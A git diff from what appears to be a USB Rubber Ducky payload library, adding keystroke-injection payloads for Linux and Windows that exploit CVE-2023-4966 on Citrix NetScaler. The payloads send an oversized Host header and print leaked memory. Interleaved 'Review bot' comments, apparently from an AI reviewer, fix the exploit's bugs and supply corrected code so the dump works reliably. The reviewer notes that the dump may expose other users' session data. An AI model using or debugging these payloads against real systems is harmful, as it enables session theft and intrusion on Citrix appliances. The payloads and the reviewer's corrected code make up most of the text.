diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md index 3507828..d6bba9b 100644 --- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md @@ -55,11 +55,6 @@ The sole configuration parameter that requires modification is the hostname, whi DEFINE #HOSTNAME 192.168.1.200 ``` -## DuckyScript Extensions Used - -- **DETECT_READY**: Extension used to check whether the machine is ready to execute the payload without making unnecessary waits. [[2](#sources)] -- **PASSIVE_WINDOWS_DETECT**: Extension used to check which operating system you are operating on so that you have a valid tool for both Windows and different systems, for instance GNU/Linux systems. [[3](#sources)] - ## Payload Description Windows In this line, a variable named `$header_value` is created, containing a string of 24576 'a' characters. This variable represents the value to be used in the HTTP header. @@ -172,9 +167,6 @@ After assigning execute permissions, the above command allows the user to run th ## Sources - [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967 -- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready -- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt -- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/ ## Credits 
@@ -196,4 +188,4 @@ After assigning execute permissions, the above command allows the user to run th
-
\ No newline at end of file
+
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt
new file mode 100644
index 0000000..93e878f
--- /dev/null
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/gnu-linux_payload.txt
@@ -0,0 +1,33 @@
+REM ################################################################################
+REM # #
+REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+REM # Author : Aleff #
+REM # Version : 1.0 #
+REM # Category : incident-response #
+REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
+REM # #
+REM ################################################################################
+
+REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+DEFINE #HOSTNAME example
+
+DEALY 2000
+CTRL-ALT t
+DELAY 1000
+
+STRINGLN_BLOCK
+ header_value=$(yes a | head -n 24576 | tr -d '\n')
+
+ headers="-H 'Host:$header_value'"
+
+ response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+
+ if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
+ echo "--- Dumped memory ---"
+ echo "$response" | cut -c 131051-
+ echo "The #HOSTNAME is vulnerable!"
+ echo "--- End ---"
+ else
+ echo "Could not dump memory"
+ fi
+END_STRINGLN
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
deleted file mode 100644
index 19176ea..0000000
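Review bot: The shell block never sets the oversized Host header it is built around: `headers="-H 'Host:$header_value'"` is passed as the *value* of `-H`, so curl emits a header literally named `-H 'Host` and the real Host header stays untouched; it should be passed directly as `-H "Host: $header_value"`. The success test cannot pass either, because `curl -s` prints only the response body, so `cut -c 1-3` compares the first three body bytes rather than an HTTP status with "200", and the `DEALY 2000` typo above `CTRL-ALT t` should read `DELAY 2000` since the DuckyScript compiler will presumably reject the unknown command. Because the region after the offset is raw memory, bash command substitution silently drops NUL bytes and `cut -c` counts characters, so writing the body to a file and slicing it with `tail -c` keeps the dump intact. If this works, the output is likely to contain other users' live session material, so a one-line `REM` warning that the terminal output must be handled as sensitive would be worth adding.
```shell
    header_value=$(yes a | head -n 24576 | tr -d '\n')
    # curl -s prints the body only: capture the status code separately, keep the
    # (binary) body in a file, and hand the Host header straight to -H
    body=$(mktemp)
    status=$(curl -s -k -o "$body" -w '%{http_code}' -H "Host: $header_value" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
    if [ "$status" = "200" ]; then
        echo "--- Dumped memory ---"
        tail -c +131051 "$body"
        # … unchanged: "vulnerable" / "End" messages …
    else
        echo "Could not dump memory"
    fi
    rm -f "$body"
```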
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ /dev/null
@@ -1,102 +0,0 @@ -REM ################################################################################ -REM # # -REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 # -REM # Author : Aleff # -REM # Version : 1.0 # -REM # Category : incident-response # -REM # Target : Citrix NetScaler ADV; NetScaler Gateway # -REM # # -REM ################################################################################ - -REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200) -DEFINE #HOSTNAME example - -REM Detect what in what OS is running the payload -EXTENSION PASSIVE_WINDOWS_DETECT - REM VERSION 1.1 - REM AUTHOR: Korben - - REM_BLOCK DOCUMENTATION - Windows fully passive OS Detection and passive Detect Ready - Includes its own passive detect ready. - Does not require additional extensions. - - USAGE: - Extension runs inline (here) - Place at beginning of payload (besides ATTACKMODE) to act as dynamic - boot delay - $_OS will be set to WINDOWS or NOT_WINDOWS - See end of payload for usage within payload - END_REM - - REM CONFIGURATION: - DEFINE #MAX_WAIT 150 - DEFINE #CHECK_INTERVAL 20 - DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 - DEFINE #NOT_WINDOWS 7 - - $_OS = #NOT_WINDOWS - - VAR $MAX_TRIES = #MAX_WAIT - WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) - DELAY #CHECK_INTERVAL - $MAX_TRIES = ($MAX_TRIES - 1) - END_WHILE - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN - $_OS = WINDOWS - END_IF -END_EXTENSION - - -REM Payload content -IF ($_OS == WINDOWS) THEN - - REM Open a powershell - GUI r - DELAY 500 - STRING powershell - ENTER - DELAY 1000 - - STRINGLN_BLOCK - $header_value = 'a' * 24576 - $header_value = $header_value -replace "\n", "" - - $headers="-H 'Host:$header_value'" - - $headers = @{ - 'Host' = $header_value - } - $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" - $response = Invoke-RestMethod -Uri $uri -Headers 
$headers -Method GET -TimeoutSec 10 - - if ($response.Substring(0, 3) -eq "200") { - Write-Host "--- Dumped memory ---" - $response.Substring(131050) # 131051 - 1 - Write-Host "The #HOSTNAME is vulnerable!" - Write-Host "--- End ---" - } else { - Write-Host "Could not dump memory" - } - END_STRINGLN -ELSE - CTRL-ALT t - DELAY 1000 - - STRINGLN_BLOCK - header_value=$(yes a | head -n 24576 | tr -d '\n') - - headers="-H 'Host:$header_value'" - - response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10) - - if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then - echo "--- Dumped memory ---" - echo "$response" | cut -c 131051- - echo "The #HOSTNAME is vulnerable!" - echo "--- End ---" - else - echo "Could not dump memory" - fi - END_STRINGLN -END_IF diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt new file mode 100644 index 0000000..7cfb88d --- /dev/null +++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/windows-payload.txt 
@@ -0,0 +1,42 @@
+REM ################################################################################
+REM # #
+REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+REM # Author : Aleff #
+REM # Version : 1.0 #
+REM # Category : incident-response #
+REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
+REM # #
+REM ################################################################################
+
+REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
+DEFINE #HOSTNAME example
+
+REM Open a powershell
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell
+ENTER
+DELAY 1000
+
+STRINGLN_BLOCK
+ $header_value = 'a' * 24576
+ $header_value = $header_value -replace "\n", ""
+
+ $headers="-H 'Host:$header_value'"
+
+ $headers = @{
+ 'Host' = $header_value
+ }
+ $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+ $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
+
+ if ($response.Substring(0, 3) -eq "200") {
+ Write-Host "--- Dumped memory ---"
+ $response.Substring(131050) # 131051 - 1
+ Write-Host "The #HOSTNAME is vulnerable!"
+ Write-Host "--- End ---"
+ } else {
+ Write-Host "Could not dump memory"
+ }
+END_STRINGLN
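Review bot: `$response.Substring(0, 3)` can never see an HTTP status, because `Invoke-RestMethod` parses the JSON body into an object rather than returning status-prefixed text, so that line throws instead of branching; and with no try/catch, any non-2xx response or TLS failure raises a terminating error before the `if` is reached, leaving the "Could not dump memory" branch unreachable. `Invoke-WebRequest` exposes `StatusCode` and the raw `Content`, so switching to it inside a try/catch makes both branches meaningful. The line `$headers="-H 'Host:$header_value'"` is a leftover from the shell version that the hashtable immediately overwrites, and `-replace "\n", ""` on a string of 'a' characters is a no-op; both can be dropped. Unlike the curl version's `-k`, nothing here skips certificate validation, and Windows PowerShell 5.1 is also restrictive about overriding `Host` through `-Headers`, so both points are worth verifying on the target's PowerShell version before relying on the "vulnerable" verdict.
```powershell
    $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
    $response = $null
    try {
        # Invoke-WebRequest keeps the status code and the raw body; Invoke-RestMethod
        # would parse the JSON into an object that has no Substring() method
        $response = Invoke-WebRequest -Uri $uri -Headers $headers -Method GET -TimeoutSec 10 -UseBasicParsing
    } catch {
        Write-Host "Request failed: $($_.Exception.Message)"
    }
    if ($response -and $response.StatusCode -eq 200) {
        Write-Host "--- Dumped memory ---"
        $response.Content.Substring(131050) # 131051 - 1
        # ... unchanged: "vulnerable" / "End" messages ...
    } else {
        Write-Host "Could not dump memory"
    }
```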